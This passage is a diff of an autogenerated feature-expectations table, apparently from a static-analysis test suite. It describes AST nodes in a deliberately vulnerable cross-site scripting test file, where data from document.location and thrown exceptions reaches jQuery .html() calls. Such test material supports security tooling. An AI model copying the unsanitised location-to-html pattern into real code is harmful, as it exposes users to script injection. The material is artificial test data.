autogenerated/Xss/ExceptionXss/exception-xss.js:78:13:78:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:13:78:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:13:78:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:13:78:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:18:78:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:18:78:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:18:78:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18995,6 +128967,68 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:78:18:78:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:18:78:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:18:78:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:14 | myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:14 | myWeirdInner | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:14 | myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:14 | myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:14 | myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | myWeirdInner(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | myWeirdInner(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | myWeirdInner(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | myWeirdInner(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:3:81:19 | myWeirdInner(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:16:81:18 | foo | CalleeFlexibleAccessPath | myWeirdInner | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:16:81:18 | foo | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:16:81:18 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:16:81:18 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:16:81:18 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:16:81:18 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:81:16:81:18 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:82:11:82:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:3:83:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:5:83:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:5:83:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:5:83:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19002,6 +129036,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:83:5:83:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:5:83:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:5:83:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:13:83:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:13:83:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:13:83:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:13:83:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:83:13:83:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:18:83:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:18:83:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:18:83:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19009,6 +129048,36 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:83:18:83:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:18:83:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:83:18:83:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:2 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:2 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:2 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:10 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:15 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:15 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:15 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:15 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:15 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | $('myId').html(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | $('myId').html(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | $('myId').html(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | $('myId').html(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | $('myId').html(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | exceptional return of $('myId').html(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | exceptional return of $('myId').html(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | exceptional return of $('myId').html(foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | exceptional return of $('myId').html(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:2:86:20 | exceptional return of $('myId').html(foo) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:4:86:9 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:4:86:9 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:4:86:9 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19016,6 +129085,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:86:4:86:9 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:4:86:9 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:4:86:9 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:12:86:15 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:12:86:15 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:12:86:15 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:12:86:15 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:86:12:86:15 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:17:86:19 | foo | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:17:86:19 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:17:86:19 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, 